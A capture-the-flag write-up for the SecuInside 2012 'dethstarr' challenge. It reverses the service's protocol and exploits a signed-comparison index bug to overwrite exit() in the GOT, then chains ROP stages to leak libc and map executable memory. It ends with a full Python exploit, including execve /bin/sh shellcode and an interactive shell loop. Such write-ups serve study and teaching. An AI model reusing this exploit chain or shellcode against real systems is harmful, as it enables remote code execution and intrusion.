Dethstarr was one of my favorite service exploitation challenges during the SecuInside 2012 contest. We had to fully reverse a given binary to understand how the protocol it implements works. To be able to debug the binary easily and in the same environment as on the remote server, we setup xinetd on a CentOS 6.2 Virtual Machine with the following configuration:

service dethstarr
{
    socket_type = stream
    wait = no
    flags = REUSE
    user = w4kfu
    server = /home/w4kfu/LSE/CTF/SecuInside_2012/dethstarr/dethstarr
    port = 4242
    type = UNLISTED
}

To trigger the bug, we have to understand how the protocol works in detail. Looking at the disassembled code, we can figure out 4 different functions that will first read a certain number of bytes, check if it matches several conditions, then read again on the socket with a user specified size (limited to avoid buffer overflows).

First check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0xCA  |  0x0  |  0x1  | 0xAC  | 0x9A  | 0x1 | 0x0 | 0x00010001| 0x54534e49  | 0x1F  |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0xCA  |  0x0  |  0x1  | 0xAC  | 0x9A  | 0x1 | 0x0 | 0x00010001| 0x54534e49  | 0x1F  |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The last 0x1F is the size for the last read call of that function (no overflow can occur)

Second check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0x8 | 0x1 | 0x1 | 0x0DFE1ABCC | <global_var>  | 0x1 | 0xFF| -42 | 0x66| 0x756C| 0xFF| 0x60|0x7FFFFFFF |0x9C |0x1F|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The global_var is set before each call to the check function.

Third check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0x001A00CB|0x000200DB |0x41420019 |0x6|0x1|0xCA |0xCCCCCCCC | <global_var>  | 0x1F|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Fourth check function

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| <addr>| 0x31323301|<index>|<index>|0x9|0x9|0x1|0xFFFF|0xFFFF0000|0x4|0x00e10052 |<global_var> |0x1F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Inside this fourth check function lies the vulnerability of this challenge: the index field ([eax+8]) is tested to be under 0x1F using a signed compare, which allows negative values:

.text:080488EE                 mov     eax, [eax+8]
.text:080488F1                 cmp     eax, 1Fh
.text:080488F4                 jle     short loc_8048909

.text:0804893A                 mov     eax, [eax+8]
.text:0804893D                 mov     edx, [ebp+buf]
.text:08048940                 mov     edx, [edx]
.text:08048942                 mov     ds:dword_804A8E0[eax*4], edx

Using this we are able to dereference a negative offset inside a global array and write anything we want in it. I choose to rewrite the exit() function address from inside the GOT. Then, when the check function called after this vulnerability fails, it will fail calling exit and jump to the address we specified. The binary contains a nice function epilogue we can use to overflow one of the program’s buffer:

.text:08049518                 mov     [esp+8], eax    ; nbytes
.text:0804951C                 lea     eax, [ebp+var_31]
.text:0804951F                 mov     [esp+4], eax    ; buf
.text:08049523                 mov     dword ptr [esp], 0 ; fd
.text:0804952A                 call    _read
.text:0804952F                 mov     eax, 0
.text:08049534
.text:08049534 end_function:                           ; CODE XREF: first_check_buff+65j
.text:08049534                                         ; first_check_buff+8Cj ...
.text:08049534                 add     esp, 44h
.text:08049537                 pop     ebx
.text:08049538                 pop     ebp
.text:08049539                 retn

The interesting thing is that the exit function is triggered with eax being the invalid size we specified (making the check fail). That means we control this register value, which is used as the read size.

After triggering this bug, we can start using ROP to build a shellcode that will bypass ASLR and NX. The shellcode will leak an address from the GOT to allow us to locate libc.so.6 in memory and build a second stage shellcode using this additional information.

First stage ROP chain

0x080495B2  # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
0x41424344  # Dummy
0x08049515  # Addres inside First check before read

Now we have the size we want in eax, which allow us to create a buffer overflow when read is called inside 0x0804928D (a.k.a first check function).

Second stage ROP chain

0x080483C4  # Address of the write function in .plt
0x08048DDA  # Return Address Second check mov ebp, esp
0x00000001  # File descriptor (stdout)
0x0804A7BC  # Address we want to write from: read@.got.plt
0x00000004  # Size of the write

Now that we have the read address from the GOT, we ret again on the second check function (it is similar to the first stage ROP chain) and re-trigger the buffer overflow to prepare for stage 3.

Third stage ROP chain

<write_addr> + 0xca60   # Computed address of mmap (libc.so.6)
0x080495B2              # add esp, 1C ; pop ; pop ; pop ; pop ; ret // clean mmap args
0x13370000              # Address to map
0x00001000              # Size to map
0x00000007              # RWX
0x00000031              # MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS
0xffffffff              # fd
0x00000000              # offset (ignored)
...
DUMMY * 20
...
0x080483F4              # read@.plt
0x13370000              # Return adress: our shellcode
0x00000000              # fd
0x13370000              # Address to read to
len(shellcode)          # Length of shellcode

This ROP chain will call mmap to a fixed address and read our shellcode (execve /bin/sh) and jump to it.

Finally this exploit works well both locally and remotely, and we were able to get the flag in the /home/dethstarr/key file. Later on we also used this exploit to get the system time of the server (using date) in order to synchronize ourself with the classico service challenge.

Here is the final exploit:

import socket
import struct
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(("61.42.25.25", 8282))
s.connect(("192.168.103.61", 4242))

def first_check():
    cmd = struct.pack("<I", 0xCA)
    cmd += struct.pack("<I", 0x0)
    cmd += struct.pack("<I", 0x1)
    cmd += struct.pack("<I", 0xAC)
    cmd += struct.pack("<I", 0x9A)
    cmd += struct.pack("<I", 0x1)
    cmd += struct.pack("<I", 0x00000000)
    cmd += struct.pack("<I", 0x00010001)
    cmd += struct.pack("<I", 0x54534e49)
    cmd += struct.pack("<I", 0x1F)
    #sys.stdout.write(cmd)
    s.send(cmd)
    cmd = "A" * (0x1F)
    #sys.stdout.write(cmd)
    s.send(cmd)


def second_check(x, size, cmd2, a):
    cmd = struct.pack("<I", a)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0x0DFE1ABCC)
    # Switch case
    cmd += struct.pack("<I", x)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0xFF)
    cmd += struct.pack("<i", -0x42)
    cmd += struct.pack("<I", 0x66)
    cmd += struct.pack("<I", 0x756C)
    cmd += struct.pack("<I", 0xFF)
    cmd += struct.pack("<I", 0x60)
    cmd += struct.pack("<I", 0x41424344)
    cmd += struct.pack("<I", 0x7FFFFFFF)
    cmd += struct.pack("<I", 0x9C)
    cmd += struct.pack("<I", size)
    #sys.stdout.write(cmd)
    s.send(cmd)
    #sys.stdout.write(cmd)
    s.send(cmd2)


def third_check():
    for i in [1, 0, 2]:
        cmd = struct.pack("<I", 0x001A00CB)
        cmd += struct.pack("<I", 0x000200DB)
        cmd += struct.pack("<I", 0x41420019)
        cmd += struct.pack("<I", 0x6)
        cmd += struct.pack("<I", 0x41424344)
        cmd += struct.pack("<I", 0xCA)
        cmd += struct.pack("<I", 0xCCCCCCCC)
        # index
        cmd += struct.pack("<I", i)
        cmd += struct.pack("<I", 0x1F)
        #sys.stdout.write(cmd)
        s.send(cmd)
        cmd = "A" * (0x1F)
        #sys.stdout.write(cmd)
        s.send(cmd)

def fourth_check(x, y, addr):
    cmd = struct.pack("<I", addr)
    cmd += struct.pack("<I", 0x31323301)
    cmd += struct.pack("<i", y)
    cmd += struct.pack("<i", y)
    cmd += struct.pack("<I", 0x9)
    cmd += struct.pack("<I", 0x9)
    cmd += struct.pack("<I", 0x1)
    cmd += struct.pack("<I", 65535)
    cmd += struct.pack("<i", -65536)
    cmd += struct.pack("<I", 0x4)
    cmd += struct.pack("<I", 0x00e10052)
    # index !!
    cmd += struct.pack("<I", x)
    cmd += struct.pack("<I", 0x1F)
    #sys.stdout.write(cmd)
    s.send(cmd)
    cmd = "A" * 0x1F
    s.send(cmd)

first_check()
print s.recv(0x60)
#raw_input()
for x in xrange(1, 6):
    if x == 2:
        continue
    second_check(x, 0x1F, "A" * 0x1F, 0x8)
print s.recv(0x44)
third_check()
print s.recv(0x78)
fourth_check(3, -2, 0x4214242)
print s.recv(0x78)
fourth_check(0, -2, 0x414242)
print s.recv(0x48)
print s.recv(0x78)
fourth_check(0, -2, 0x414242)
print s.recv(0x78)
# Overwrite exit()
fourth_check(2, -65, 0x08049518)
print s.recv(0x78)

cmd = "B" * 9
cmd += struct.pack("<I", 0x080495B2)        # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
cmd += struct.pack("<I", 0x41424344)        # Dummy
cmd += struct.pack("<I", 0x08049515)        # Addres inside First check before read
cmd += "B" * 10

second_check(5, 0x100, cmd, 8)
size_payload = 0
max_size = 0x100
payload = "B" * 26
payload += struct.pack("<I", 0x080483C4)    # .plt write
payload += struct.pack("<I", 0x08048DDA)    # ret addr second check : mov ebp, esp
payload += struct.pack("<I", 0x00000001)    # fd
payload += struct.pack("<I", 0x0804A7BC)    # .got.plt write
payload += struct.pack("<I", 0x00000004)    # size write

s.send(payload + "B" * 20 + "X" * (0x100 - len(payload) - 20 - len(cmd)))
print s.recv(65536)

# RECV ADDR WRITE
d = s.recv(4)
write_addr = struct.unpack("<I", d)[0]
print "Write_addr =", hex(write_addr)

cmd = "B" * 9
cmd += struct.pack("<I", 0x080495B2)        # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret
cmd += struct.pack("<I", 0x41424344)        # Dummy
cmd += struct.pack("<I", 0x08049515)        # Address inside First check before read
cmd += "B" * 10

second_check(5, 0x100, cmd, 8)

payload = "B" * 26

payload += struct.pack("<I", write_addr + 0xca60)   # Addr mmap
payload += struct.pack("<I", 0x080495B2)            # addp esp, 0x1C ; pop; pop ; pop ; pop ; ret
payload += struct.pack("<I", 0x13370000) # Addr
payload += struct.pack("<I", 4096)       # Size
payload += struct.pack("<I", 7)          # rwx
payload += struct.pack("<I", 49)         # MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS
payload += struct.pack("<I", 0xffffffff) # -1
payload += struct.pack("<I", 0)          # osef

payload += "B" * 20

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

payload += struct.pack("<I", 0x080483F4)    # .plt read
payload += struct.pack("<I", 0x13370000)    # return addr shellcode
payload += struct.pack("<I", 0x00000000)    # fd
payload += struct.pack("<I", 0x13370000)    # addr to read
payload += struct.pack("<I", len(shellcode))# len of shellcode

s.send(payload + "X" * (0x100 - len(payload) - len(cmd)))

s.send(shellcode)

while True:
    print ">",
    cmd = raw_input()
    if not cmd:
        break
    s.send(cmd + "\n")
    sys.stdout.write(s.recv(65536) + "\n")

Thanks to the SecuIniside CTF organizers for all these awesome binaries!